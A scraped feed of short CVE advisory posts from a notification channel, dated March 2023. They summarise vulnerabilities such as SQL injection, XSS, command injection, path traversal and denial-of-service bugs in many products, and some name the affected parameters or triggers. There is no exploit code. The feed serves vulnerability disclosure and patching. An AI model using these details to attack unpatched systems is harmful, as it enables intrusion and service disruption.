🚨 CVE-2023-28428PDFio is a C library for reading and writing PDF files. In versions 1.1.0 and prior, a denial of service vulnerability exists in the pdfio parser. Crafted pdf files can cause the program to run at 100% utilization and never terminate. This is different from CVE-2023-24808. A patch for this issue is available in version 1.1.1.🎖@cveNotify |
|
| 2023-03-24 21:29:38 |
🚨 CVE-2023-28424Soko if the code that powers packages.gentoo.org. Prior to version 1.0.2, the two package search handlers, `Search` and `SearchFeed`, implemented in `pkg/app/handler/packages/search.go`, are affected by a SQL injection via the `q` parameter. As a result, unauthenticated attackers can execute arbitrary SQL queries on `https://packages.gentoo.org/`. It was also demonstrated that primitive was enough to gain code execution in the context of the PostgreSQL container. The issue was addressed in commit `4fa6e4b619c0362728955b6ec56eab0e0cbf1e23y` of version 1.0.2 using prepared statements to interpolate user-controlled data in SQL queries.🎖@cveNotify |
|
| 2023-03-24 21:29:37 |
🚨 CVE-2019-12450file_copy_fallback in gio/gfile.c in GNOME GLib 2.15.0 through 2.61.1 does not properly restrict file permissions while a copy operation is in progress. Instead, default permissions are used.🎖@cveNotify |
|
| 2023-03-24 21:29:36 |
🚨 CVE-2023-28606js/event-graph.js in MISP before 2.4.169 allows XSS via event-graph node tooltips.🎖@cveNotify |
|
| 2023-03-24 19:30:03 |
🚨 CVE-2023-28686Dino before 0.2.3, 0.3.x before 0.3.2, and 0.4.x before 0.4.2 allows attackers to modify the personal bookmark store via a crafted message. The attacker can change the display of group chats or force a victim to join a group chat; the victim may then be tricked into disclosing sensitive information.🎖@cveNotify |
|
| 2023-03-24 19:30:02 |
🚨 CVE-2023-28818An issue was discovered in Veritas NetBackup IT Analytics 11 before 11.2.0. The application upgrade process included unsigned files that could be exploited and result in a customer installing unauthentic components. A malicious actor could install rogue Collector executable files (aptare.jar or upgrademanager.zip) on the Portal server, which might then be downloaded and installed on collectors.🎖@cveNotify |
|
| 2023-03-24 19:30:01 |
🚨 CVE-2019-11543XSS exists in the admin web console in Pulse Secure Pulse Connect Secure (PCS) 9.0RX before 9.0R3.4, 8.3RX before 8.3R7.1, and 8.1RX before 8.1R15.1 and Pulse Policy Secure 9.0RX before 9.0R3.2, 5.4RX before 5.4R7.1, and 5.2RX before 5.2R12.1.🎖@cveNotify |
|
| 2023-03-24 19:29:57 |
🚨 CVE-2019-11538In Pulse Secure Pulse Connect Secure version 9.0RX before 9.0R3.4, 8.3RX before 8.3R7.1, 8.2RX before 8.2R12.1, and 8.1RX before 8.1R15.1, an NFS problem could allow an authenticated attacker to access the contents of arbitrary files on the affected device.🎖@cveNotify |
|
| 2023-03-24 19:29:56 |
🚨 CVE-2019-11774Prior to 0.1, all builds of Eclipse OMR contain a bug where the loop versioner may fail to privatize a value that is pulled out of the loop by versioning - for example if there is a condition that is moved out of the loop that reads a field we may not privatize the value of that field in the modified copy of the loop allowing the test to see one value of the field and subsequently the loop to see a modified field value without retesting the condition moved out of the loop. This can lead to a variety of different issues but read out of array bounds is one major consequence of these problems.🎖@cveNotify |
|
| 2023-03-24 19:29:55 |
🚨 CVE-2019-11507In Pulse Secure Pulse Connect Secure (PCS) 8.3.x before 8.3R7.1 and 9.0.x before 9.0R3, an XSS issue has been found on the Application Launcher page.🎖@cveNotify |
|
| 2023-03-24 19:29:54 |
🚨 CVE-2019-1680A vulnerability in Cisco Webex Business Suite could allow an unauthenticated, remote attacker to inject arbitrary text into a user's browser. The vulnerability is due to improper validation of input. An attacker could exploit this vulnerability by convincing a targeted user to view a malicious URL. A successful exploit could allow the attacker to inject arbitrary text into the user's browser. The attacker could use the content injection to conduct spoofing attacks. Versions prior than 3.0.9 are affected.🎖@cveNotify |
|
| 2023-03-24 19:29:50 |
🚨 CVE-2019-11771AIX builds of Eclipse OpenJ9 before 0.15.0 contain unused RPATHs which may facilitate code injection and privilege elevation by local users.🎖@cveNotify |
|
| 2023-03-24 19:29:49 |
🚨 CVE-2019-11770In Eclipse Buildship versions prior to 3.1.1, the build files indicate that this project is resolving dependencies over HTTP instead of HTTPS. Any of these artifacts could have been MITM to maliciously compromise them and infect the build artifacts that were produced. Additionally, if any of these JARs or other dependencies were compromised, any developers using these could continue to be infected past updating to fix this.🎖@cveNotify |
|
| 2023-03-24 19:29:48 |
🚨 CVE-2019-1738A vulnerability in the Network-Based Application Recognition (NBAR) feature of Cisco IOS Software and Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause an affected device to reload. This vulnerability is due to a parsing issue on DNS packets. An attacker could exploit these vulnerabilities by sending crafted DNS packets through routers that are running an affected version and have NBAR enabled. A successful exploit could allow the attacker to cause the affected device to reload, resulting in a denial of service (DoS) condition.🎖@cveNotify |
|
| 2023-03-24 19:29:47 |
🚨 CVE-2019-1681A vulnerability in the TFTP service of Cisco Network Convergence System 1000 Series software could allow an unauthenticated, remote attacker to retrieve arbitrary files from the targeted device, possibly resulting in information disclosure. The vulnerability is due to improper validation of user-supplied input within TFTP requests processed by the affected software. An attacker could exploit this vulnerability by using directory traversal techniques in malicious requests sent to the TFTP service on a targeted device. An exploit could allow the attacker to retrieve arbitrary files from the targeted device, resulting in the disclosure of sensitive information. This vulnerability affects Cisco IOS XR Software releases prior to Release 6.5.2 for Cisco Network Convergence System 1000 Series devices when the TFTP service is enabled.🎖@cveNotify |
|
| 2023-03-24 19:29:46 |
🚨 CVE-2019-1739A vulnerability in the Network-Based Application Recognition (NBAR) feature of Cisco IOS Software and Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause an affected device to reload. This vulnerability is due to a parsing issue on DNS packets. An attacker could exploit this vulnerability by sending crafted DNS packets through routers that are running an affected version and have NBAR enabled. A successful exploit could allow the attacker to cause the affected device to reload, resulting in a denial of service (DoS) condition.🎖@cveNotify |
|
| 2023-03-24 19:29:42 |
🚨 CVE-2019-1820A vulnerability in the web-based management interface of Cisco Prime Infrastructure and Cisco Evolved Programmable Network (EPN) Manager software could allow an authenticated, remote attacker to download and view files within the application that should be restricted. This vulnerability is due to improper sanitization of user-supplied input in HTTP request parameters that describe filenames. An attacker could exploit this vulnerability by using directory traversal techniques to submit a path to a desired file location. A successful exploit could allow the attacker to view application files that may contain sensitive information.🎖@cveNotify |
|
| 2023-03-24 19:29:41 |
🚨 CVE-2019-1809A vulnerability in the Image Signature Verification feature of Cisco NX-OS Software could allow an authenticated, local attacker with administrator-level credentials to install a malicious software patch on an affected device. The vulnerability is due to improper verification of digital signatures for patch images. An attacker could exploit this vulnerability by crafting an unsigned software patch to bypass signature checks and loading it on an affected device. A successful exploit could allow the attacker to boot a malicious software patch image.🎖@cveNotify |
|
| 2023-03-24 19:29:40 |
🚨 CVE-2019-1808A vulnerability in the Image Signature Verification feature of Cisco NX-OS Software could allow an authenticated, local attacker with administrator-level credentials to install a malicious software patch on an affected device. The vulnerability is due to improper verification of digital signatures for patch images. An attacker could exploit this vulnerability by loading an unsigned software patch on an affected device. A successful exploit could allow the attacker to boot a malicious software patch image.🎖@cveNotify |
|
| 2023-03-24 19:29:39 |
🚨 CVE-2019-1822A vulnerability in the web-based management interface of Cisco Prime Infrastructure (PI) and Cisco Evolved Programmable Network (EPN) Manager could allow an authenticated, remote attacker to execute code with root-level privileges on the underlying operating system. This vulnerability exist because the software improperly validates user-supplied input. An attacker could exploit this vulnerability by uploading a malicious file to the administrative web interface. A successful exploit could allow the attacker to execute code with root-level privileges on the underlying operating system.🎖@cveNotify |
|
| 2023-03-24 19:29:38 |
🚨 CVE-2019-1810A vulnerability in the Image Signature Verification feature used in an NX-OS CLI command in Cisco Nexus 3000 Series and 9000 Series Switches could allow an authenticated, local attacker with administrator-level credentials to install a malicious software image on an affected device. The vulnerability exists because software digital signatures are not properly verified during CLI command execution. An attacker could exploit this vulnerability to install an unsigned software image on an affected device. Note: If the device has not been patched for the vulnerability previously disclosed in the Cisco Security Advisory cisco-sa-20190306-nxos-sig-verif, a successful exploit could allow the attacker to boot a malicious software image.🎖@cveNotify |
|
| 2023-03-24 16:30:15 |
🚨 CVE-2023-1176Absolute Path Traversal in GitHub repository mlflow/mlflow prior to 2.2.1.🎖@cveNotify |
|
| 2023-03-24 16:30:14 |
🚨 CVE-2023-24625Faveo 5.0.1 allows remote attackers to obtain sensitive information via a modified user ID in an Insecure Direct Object Reference (IDOR) attack.🎖@cveNotify |
|
| 2023-03-24 16:30:13 |
🚨 CVE-2023-1480A vulnerability classified as critical was found in SourceCodester Monitoring of Students Cyber Accounts System 1.0. Affected by this vulnerability is an unknown functionality of the file login.php of the component POST Parameter Handler. The manipulation of the argument un leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-223363.🎖@cveNotify |
|
| 2023-03-24 16:30:12 |
🚨 CVE-2023-1390A remote denial of service vulnerability was found in the Linux kernel’s TIPC kernel module. The while loop in tipc_link_xmit() hits an unknown state while attempting to parse SKBs, which are not in the queue. Sending two small UDP packets to a system with a UDP bearer results in the CPU utilization for the system to instantly spike to 100%, causing a denial of service condition.🎖@cveNotify |
|
| 2023-03-24 16:30:08 |
🚨 CVE-2023-28460A command injection vulnerability was discovered in Array Networks APV products. A remote attacker can send a crafted packet after logging into the affected appliance as an administrator, resulting in arbitrary shell code execution. This is fixed in 8.6.1.262 or newer and 10.4.2.93 or newer.🎖@cveNotify |
|
| 2023-03-24 16:30:07 |
🚨 CVE-2023-28461Array Networks Array AG Series and vxAG (9.4.0.481 and earlier) allow remote code execution. An attacker can browse the filesystem on the SSL VPN gateway using a flags attribute in an HTTP header without authentication. The product could then be exploited through a vulnerable URL. The 2023-03-09 vendor advisory stated "a new Array AG release with the fix will be available soon."🎖@cveNotify |
|
| 2023-03-24 16:30:06 |
🚨 CVE-2022-34408Dell PowerEdge BIOS and Dell Precision BIOS contain an Improper SMM communication buffer verification vulnerability. A local malicious user with high Privileges may potentially exploit this vulnerability to perform arbitrary code execution or cause denial of service.🎖@cveNotify |
|
| 2023-03-24 16:30:05 |
🚨 CVE-2023-27591Miniflux is a feed reader. Prior to version 2.0.43, an unauthenticated user can retrieve Prometheus metrics from a publicly reachable Miniflux instance where the `METRICS_COLLECTOR` configuration option is enabled and `METRICS_ALLOWED_NETWORKS` is set to `127.0.0.1/8` (the default). A patch is available in Miniflux 2.0.43. As a workaround, set `METRICS_COLLECTOR` to `false` (default) or run Miniflux behind a trusted reverse-proxy.🎖@cveNotify |
|
| 2023-03-24 16:30:04 |
🚨 CVE-2022-26080Use of Insufficiently Random Values vulnerability in ABB Pulsar Plus System Controller NE843_S, ABB Infinity DC Power Plant.This issue affects Pulsar Plus System Controller NE843_S : comcode 150042936; Infinity DC Power Plant: H5692448 G104 G842 G224L G630-4 G451C(2) G461(2) – comcode 150047415.🎖@cveNotify |
|
| 2023-03-24 16:30:00 |
🚨 CVE-2023-1153Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Pacsrapor allows SQL Injection, Command Line Execution through SQL Injection.This issue affects Pacsrapor: before 1.22.🎖@cveNotify |
|
| 2023-03-24 16:29:59 |
🚨 CVE-2023-1154Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Pacsrapor allows Reflected XSS.This issue affects Pacsrapor: before 1.22.🎖@cveNotify |
|
| 2023-03-24 16:29:58 |
🚨 CVE-2022-48424In the Linux kernel before 6.1.3, fs/ntfs3/inode.c does not validate the attribute name offset. An unhandled page fault may occur.🎖@cveNotify |
|
| 2023-03-24 16:29:57 |
🚨 CVE-2023-1490A vulnerability was found in Max Secure Anti Virus Plus 19.0.2.1 and classified as critical. Affected by this issue is some unknown functionality in the library SDActMon.sys of the component IoControlCode Handler. The manipulation leads to improper access controls. An attack has to be approached locally. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-223376.🎖@cveNotify |
|
| 2023-03-24 16:29:53 |
🚨 CVE-2023-1491A vulnerability was found in Max Secure Anti Virus Plus 19.0.2.1. It has been classified as critical. This affects an unknown part in the library MaxCryptMon.sys of the component IoControlCode Handler. The manipulation leads to improper access controls. Local access is required to approach this attack. The exploit has been disclosed to the public and may be used. The identifier VDB-223377 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-03-24 16:29:52 |
🚨 CVE-2022-28495TOTOLink outdoor CPE CP900 V6.3c.566_B20171026 is discovered to contain a command injection vulnerability in the setWebWlanIdx function via the webWlanIdx parameter. This vulnerability allows attackers to execute arbitrary commands via a crafted request.🎖@cveNotify |
|
| 2023-03-24 16:29:51 |
🚨 CVE-2022-42948Cobalt Strike 4.7.1 fails to properly escape HTML tags when they are displayed on Swing components. By injecting crafted HTML code, it is possible to remotely execute code in the Cobalt Strike UI.🎖@cveNotify |
|
| 2023-03-24 16:29:50 |
🚨 CVE-2023-1479A vulnerability classified as critical has been found in SourceCodester Simple Music Player 1.0. Affected is an unknown function of the file save_music.php. The manipulation of the argument filename leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-223362 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-03-24 14:30:06 |
🚨 CVE-2022-48423In the Linux kernel before 6.1.3, fs/ntfs3/record.c does not validate resident attribute names. An out-of-bounds write may occur.🎖@cveNotify |
|
| 2023-03-24 14:30:05 |
🚨 CVE-2023-27242SourceCodester Loan Management System v1.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the Type parameter under the Edit Loan Types module.🎖@cveNotify |
|
| 2023-03-24 13:29:49 |
🚨 CVE-2022-4148The WP OAuth Server (OAuth Authentication) WordPress plugin before 4.2.5 has a flawed CSRF and authorisation check when deleting a client, which could allow any authenticated users, such as subscriber to delete arbitrary client.🎖@cveNotify |
|
| 2023-03-24 13:29:48 |
🚨 CVE-2023-0940The ProfileGrid WordPress plugin before 5.3.1 provides an AJAX endpoint for resetting a user password but does not implement proper authorization. This allows a user with low privileges, such as subscriber, to change the password of any account, including Administrator ones.🎖@cveNotify |
|
| 2023-03-24 13:29:47 |
🚨 CVE-2022-4550The User Activity WordPress plugin through 1.0.1 checks headers such as the X-Forwarded-For to retrieve the IP address of the request, which could lead to IP spoofing🎖@cveNotify |
|
| 2023-03-24 05:30:10 |
🚨 CVE-2023-27638An issue was discovered in the tshirtecommerce (aka Custom Product Designer) component 2.1.4 for PrestaShop. An HTTP request can be forged with a compromised tshirtecommerce_design_cart_id GET parameter in order to exploit an insecure parameter in the functions hookActionCartSave and updateCustomizationTable, which could lead to a SQL injection. This is exploited in the wild in March 2023.🎖@cveNotify |
|
| 2023-03-24 05:30:09 |
🚨 CVE-2023-1565A vulnerability was found in FeiFeiCMS 2.7.130201. It has been classified as problematic. This affects an unknown part of the file \Public\system\slide_add.html of the component Extension Tool. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-223557 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-03-24 05:30:08 |
🚨 CVE-2022-45121Versions of VISAM VBASE Automation Base prior to 11.7.5 may disclose information if a valid user opens a specially crafted file.🎖@cveNotify |
|
| 2023-03-24 05:30:07 |
🚨 CVE-2022-45468Versions of VISAM VBASE Automation Base prior to 11.7.5 may disclose information if a valid user opens a specially crafted file.🎖@cveNotify |
|
| 2023-03-24 05:30:03 |
🚨 CVE-2023-26805Tenda W20E v15.11.0.6 (US_W20EV4.0br_v15.11.0.6(1068_1546_841)_CN_TDC) is vulnerable to Buffer Overflow via function formIPMacBindModify.🎖@cveNotify |
|
| 2023-03-24 05:30:02 |
🚨 CVE-2023-26806Tenda W20E v15.11.0.6(US_W20EV4.0br_v15.11.0.6(1068_1546_841 is vulnerable to Buffer Overflow via function formSetSysTime,🎖@cveNotify |
|
| 2023-03-24 05:30:01 |
🚨 CVE-2022-3894The WP OAuth Server (OAuth Authentication) WordPress plugin before 4.2.5 does not have CSRF check when deleting a client, and does not ensure that the object to be deleted is actually a client, which could allow attackers to make a logged in admin delete arbitrary client and post via a CSRF attack.🎖@cveNotify |
|
| 2023-03-24 05:30:00 |
🚨 CVE-2023-1561A vulnerability, which was classified as critical, was found in code-projects Simple Online Hotel Reservation System 1.0. Affected is an unknown function of the file add_room.php. The manipulation leads to unrestricted upload. It is possible to launch the attack remotely. VDB-223554 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-03-24 05:29:59 |
🚨 CVE-2022-4148The WP OAuth Server (OAuth Authentication) WordPress plugin before 4.2.5 has a flawed CSRF and authorisation check when deleting a client, which could allow any authenticated users, such as subscriber to delete arbitrary client.🎖@cveNotify |
|
| 2023-03-24 05:29:55 |
🚨 CVE-2023-1532Out of bounds read in GPU Video in Google Chrome prior to 111.0.5563.110 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-03-24 05:29:54 |
🚨 CVE-2023-1559A vulnerability classified as problematic was found in SourceCodester Storage Unit Rental Management System 1.0. This vulnerability affects unknown code of the file classes/Users.php?f=save. The manipulation leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-223552.🎖@cveNotify |
|
| 2023-03-24 05:29:53 |
🚨 CVE-2023-1562Mattermost fails to check the "Show Full Name" setting when rendering the result for the /plugins/focalboard/api/v2/users API call, allowing an attacker to learn the full name of a board owner.🎖@cveNotify |
|
| 2023-03-24 05:29:49 |
🚨 CVE-2023-1542Business Logic Errors in GitHub repository answerdev/answer prior to 1.0.6.🎖@cveNotify |
|
| 2023-03-24 05:29:48 |
🚨 CVE-2023-1545SQL Injection in GitHub repository nilsteampassnet/teampass prior to 3.0.0.23.🎖@cveNotify |
|
| 2023-03-24 05:29:47 |
🚨 CVE-2023-22253Experience Manager versions 6.5.15.0 (and earlier) are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.🎖@cveNotify |
|
| 2023-03-24 05:29:46 |
🚨 CVE-2023-22256Experience Manager versions 6.5.15.0 (and earlier) are affected by a URL Redirection to Untrusted Site ('Open Redirect') vulnerability. A low-privilege authenticated attacker could leverage this vulnerability to redirect users to malicious websites. Exploitation of this issue requires user interaction.🎖@cveNotify |
|
| 2023-03-24 01:29:37 |
🚨 CVE-2023-24295A stack overfow in SoftMaker Software GmbH FlexiPDF v3.0.3.0 allows attackers to execute arbitrary code after opening a crafted PDF file.🎖@cveNotify |
|
| 2023-03-24 01:29:36 |
🚨 CVE-2023-27034PrestaShop jmsblog 2.5.5 was discovered to contain a SQL injection vulnerability.🎖@cveNotify |
|
| 2023-03-23 23:29:44 |
🚨 CVE-2023-0027Rockwell Automation Modbus TCP Server AOI prior to 2.04.00 is vulnerable to an unauthorized user sending a malformed message that could cause the controller to respond with a copy of the most recent response to the last valid request. If exploited, an unauthorized user could read the connected device’s Modbus TCP Server AOI information.🎖@cveNotify |
|
| 2023-03-23 23:29:43 |
🚨 CVE-2023-23622Discourse is an open-source discussion platform. Prior to version 3.0.1 of the `stable` branch and version 3.1.0.beta2 of the `beta` and `tests-passed` branches, the count of topics displayed for a tag is a count of all regular topics regardless of whether the topic is in a read restricted category or not. As a result, any users can technically poll a sensitive tag to determine if a new topic is created in a category which the user does not have excess to. In version 3.0.1 of the `stable` branch and version 3.1.0.beta2 of the `beta` and `tests-passed` branches, the count of topics displayed for a tag defaults to only counting regular topics which are not in read restricted categories. Staff users will continue to see a count of all topics regardless of the topic's category read restrictions.🎖@cveNotify |
|
| 2023-03-23 23:29:42 |
🚨 CVE-2023-21459Use after free vulnerability in decon driver prior to SMR Mar-2023 Release 1 allows attackers to cause memory access fault.🎖@cveNotify |
|
| 2023-03-23 18:29:51 |
🚨 CVE-2023-20029A vulnerability in the Meraki onboarding feature of Cisco IOS XE Software could allow an authenticated, local attacker to gain root level privileges on an affected device. This vulnerability is due to insufficient memory protection in the Meraki onboarding feature of an affected device. An attacker could exploit this vulnerability by modifying the Meraki registration parameters. A successful exploit could allow the attacker to elevate privileges to root.🎖@cveNotify |
|
| 2023-03-23 18:29:50 |
🚨 CVE-2023-20035A vulnerability in the CLI of Cisco IOS XE SD-WAN Software could allow an authenticated, local attacker to execute arbitrary commands with elevated privileges. This vulnerability is due to insufficient input validation by the system CLI. An attacker with privileges to run commands could exploit this vulnerability by first authenticating to an affected device using either local terminal access or a management shell interface and then submitting crafted input to the system CLI. A successful exploit could allow the attacker to execute commands on the underlying operating system with root-level privileges. An attacker with limited user privileges could use this vulnerability to gain complete control over the system. Note: For additional information about specific impacts, see the Details section of this advisory.🎖@cveNotify |
|
| 2023-03-23 16:30:12 |
🚨 CVE-2023-27077Stack Overflow vulnerability found in 360 D901 allows a remote attacker to cause a Distributed Denial of Service (DDOS) via a crafted HTTP package.🎖@cveNotify |
|
| 2023-03-23 16:30:11 |
🚨 CVE-2023-27078A command injection issue was found in TP-Link MR3020 v.1_150921 that allows a remote attacker to execute arbitrary commands via a crafted request to the tftp endpoint.🎖@cveNotify |
|
| 2023-03-23 16:30:10 |
🚨 CVE-2023-27135TOTOlink A7100RU V7.4cu.2313_B20191024 was discovered to contain a command injection vulnerability via the enabled parameter at /setting/setWanIeCfg.🎖@cveNotify |
|
| 2023-03-23 16:30:09 |
🚨 CVE-2023-28772An issue was discovered in the Linux kernel before 5.13.3. lib/seq_buf.c has a seq_buf_putmem_hex buffer overflow.🎖@cveNotify |
|
| 2023-03-23 16:30:05 |
🚨 CVE-2022-28493A vulnerability in TOTOLINK CP900 V6.3c.566 allows attackers to start the Telnet service,🎖@cveNotify |
|
| 2023-03-23 16:30:04 |
🚨 CVE-2023-1538Observable Timing Discrepancy in GitHub repository answerdev/answer prior to 1.0.6.🎖@cveNotify |
|
| 2023-03-23 16:30:03 |
🚨 CVE-2023-1536Cross-site Scripting (XSS) - Stored in GitHub repository answerdev/answer prior to 1.0.7.🎖@cveNotify |
|
| 2023-03-23 16:30:02 |
🚨 CVE-2023-1537Authentication Bypass by Capture-replay in GitHub repository answerdev/answer prior to 1.0.6.🎖@cveNotify |
|
| 2023-03-23 16:30:01 |
🚨 CVE-2023-27580CodeIgniter Shield provides authentication and authorization for the CodeIgniter 4 PHP framework. An improper implementation was found in the password storage process. All hashed passwords stored in Shield v1.0.0-beta.3 or earlier are easier to crack than expected due to the vulnerability. Therefore, they should be removed as soon as possible. If an attacker gets (1) the user's hashed password by Shield, and (2) the hashed password (SHA-384 hash without salt) from somewhere, the attacker may easily crack the user's password. Upgrade to Shield v1.0.0-beta.4 or later to fix this issue. After upgrading, all users’ hashed passwords should be updated (saved to the database). There are no known workarounds.🎖@cveNotify |
|
| 2023-03-23 15:29:35 |
🚨 CVE-2023-1594A vulnerability, which was classified as critical, was found in novel-plus 3.6.2. Affected is the function MenuService of the file sys/menu/list. The manipulation of the argument sort leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-223662 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-03-23 13:29:39 |
🚨 CVE-2018-25048The CODESYS runtime system in multiple versions allows an remote low privileged attacker to use a path traversal vulnerability to access and modify all system files as well as DoS the device.🎖@cveNotify |
|
| 2023-03-23 13:29:38 |
🚨 CVE-2023-1595A vulnerability has been found in novel-plus 3.6.2 and classified as critical. Affected by this vulnerability is an unknown functionality of the file common/log/list. The manipulation of the argument sort leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-223663.🎖@cveNotify |
|
| 2023-03-23 13:29:37 |
🚨 CVE-2023-1592A vulnerability classified as critical was found in SourceCodester Automatic Question Paper Generator System 1.0. This vulnerability affects unknown code of the file admin/courses/view_class.php of the component GET Parameter Handler. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The identifier of this vulnerability is VDB-223660.🎖@cveNotify |
|
| 2023-03-23 13:29:36 |
🚨 CVE-2023-1593A vulnerability, which was classified as problematic, has been found in SourceCodester Automatic Question Paper Generator System 1.0. This issue affects some unknown processing of the file classes/Master.php?f=save_class. The manipulation of the argument description leads to cross site scripting. The attack may be initiated remotely. The identifier VDB-223661 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-03-23 11:29:41 |
🚨 CVE-2023-1589A vulnerability has been found in SourceCodester Online Tours & Travels Management System 1.0 and classified as critical. This vulnerability affects the function exec of the file admin/operations/approve_delete.php. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-223654 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-03-23 11:29:40 |
🚨 CVE-2023-1590A vulnerability was found in SourceCodester Online Tours & Travels Management System 1.0 and classified as critical. This issue affects the function exec of the file admin/operations/currency.php. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-223655.🎖@cveNotify |
|
| 2023-03-23 11:29:37 |
🚨 CVE-2023-1410Grafana is an open-source platform for monitoring and observability. Grafana had a stored XSS vulnerability in the Graphite FunctionDescription tooltip. The stored XSS vulnerability was possible due the value of the Function Description was not properly sanitized. An attacker needs to have control over the Graphite data source in order to manipulate a function description and a Grafana admin needs to configure the data source, later a Grafana user needs to select a tampered function and hover over the description. Users may upgrade to version 8.5.22, 9.2.15 and 9.3.11 to receive a fix.🎖@cveNotify |
|
| 2023-03-23 11:29:36 |
🚨 CVE-2022-22512Hard-coded credentials in Web-UI of multiple VARTA Storage products in multiple versions allows an unauthorized attacker to gain administrative access to the Web-UI via network.🎖@cveNotify |
|
| 2023-03-23 11:29:35 |
🚨 CVE-2023-26114Versions of the package code-server before 4.10.1 are vulnerable to Missing Origin Validation in WebSockets handshakes. Exploiting this vulnerability can allow an adversary in specific scenarios to access data from and connect to the code-server instance.🎖@cveNotify |
|
| 2023-03-23 06:29:49 |
🚨 CVE-2023-28119The crewjam/saml go library contains a partial implementation of the SAML standard in golang. Prior to version 0.4.13, the package's use of `flate.NewReader` does not limit the size of the input. The user can pass more than 1 MB of data in the HTTP request to the processing functions, which will be decompressed server-side using the Deflate algorithm. Therefore, after repeating the same request multiple times, it is possible to achieve a reliable crash since the operating system kills the process. This issue is patched in version 0.4.13.🎖@cveNotify |
|
| 2023-03-23 06:29:45 |
🚨 CVE-2023-28117Sentry SDK is the official Python SDK for Sentry, real-time crash reporting software. When using the Django integration of versions prior to 1.14.0 of the Sentry SDK in a specific configuration it is possible to leak sensitive cookies values, including the session cookie to Sentry. These sensitive cookies could then be used by someone with access to your Sentry issues to impersonate or escalate their privileges within your application. In order for these sensitive values to be leaked, the Sentry SDK configuration must have `sendDefaultPII` set to `True`; one must use a custom name for either `SESSION_COOKIE_NAME` or `CSRF_COOKIE_NAME` in one's Django settings; and one must not be configured in one's organization or project settings to use Sentry's data scrubbing features to account for the custom cookie names. As of version 1.14.0, the Django integration of the `sentry-sdk` will detect the custom cookie names based on one's Django settings and will remove the values from the payload before sending the data to Sentry. As a workaround, use the SDK's filtering mechanism to remove the cookies from the payload that is sent to Sentry. For error events, this can be done with the `before_send` callback method and for performance related events (transactions) one can use the `before_send_transaction` callback method. Those who want to handle filtering of these values on the server-side can also use Sentry's advanced data scrubbing feature to account for the custom cookie names. Look for the `$http.cookies`, `$http.headers`, `$request.cookies`, or `$request.headers` fields to target with a scrubbing rule.🎖@cveNotify |
|
| 2023-03-23 06:29:44 |
🚨 CVE-2022-45003Gophish through 0.12.1 allows attackers to cause a Denial of Service (DoS) via a crafted payload involving autofocus.🎖@cveNotify |
|
| 2023-03-23 06:29:43 |
🚨 CVE-2022-45004Gophish through 0.12.1 was discovered to contain a cross-site scripting (XSS) vulnerability via a crafted landing page.🎖@cveNotify |
|
| 2023-03-23 06:29:42 |
🚨 CVE-2023-0870A form can be manipulated with cross-site request forgery in multiple versions of OpenNMS Meridian and Horizon. This can potentially allow an attacker to gain access to confidential information and compromise integrity. The solution is to upgrade to Meridian 2023.1.1 or Horizon 31.0.6 or newer. Meridian and Horizon installation instructions state that they are intended for installation within an organization's private networks and should not be directly accessible from the Internet.🎖@cveNotify |
|
| 2023-03-23 06:29:38 |
🚨 CVE-2023-28114`cilium-cli` is the command line interface to install, manage, and troubleshoot Kubernetes clusters running Cilium. Prior to version 0.13.2,`cilium-cli`, when used to configure cluster mesh functionality, can remove the enforcement of user permissions on the `etcd` store used to mirror local cluster information to remote clusters. Users who have set up cluster meshes using the Cilium Helm chart are not affected by this issue. Due to an incorrect mount point specification, the settings specified by the `initContainer` that configures `etcd` users and their permissions are overwritten when using `cilium-cli` to configure a cluster mesh. An attacker who has already gained access to a valid key and certificate for an `etcd` cluster compromised in this manner could then modify state in that `etcd` cluster. This issue is patched in `cilium-cli` 0.13.2. As a workaround, one may use Cilium's Helm charts to create their cluster.🎖@cveNotify |
|
| 2023-03-23 06:29:37 |
🚨 CVE-2022-43863IBM QRadar SIEM 7.4 and 7.5 is vulnerable to privilege escalation, allowing a user with some admin capabilities to gain additional admin capabilities. IBM X-Force ID: 239425.🎖@cveNotify |
|
| 2023-03-23 06:29:36 |
🚨 CVE-2023-27054A cross-site scripting (XSS) vulnerability in MiroTalk P2P before commit f535b35 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name parameter under the settings module.🎖@cveNotify |
|
| 2023-03-23 06:29:35 |
🚨 CVE-2023-27060LightCMS v1.3.7 was discovered to contain a remote code execution (RCE) vulnerability via the image:make function.🎖@cveNotify |
|
| 2023-03-23 01:29:43 |
🚨 CVE-2023-27100Improper restriction of excessive authentication attempts in the SSHGuard component of Netgate pfSense Plus software v22.05.1 and pfSense CE software v2.6.0 allows attackers to bypass brute force protection mechanisms via crafted web requests.🎖@cveNotify |
|
| 2023-03-23 01:29:42 |
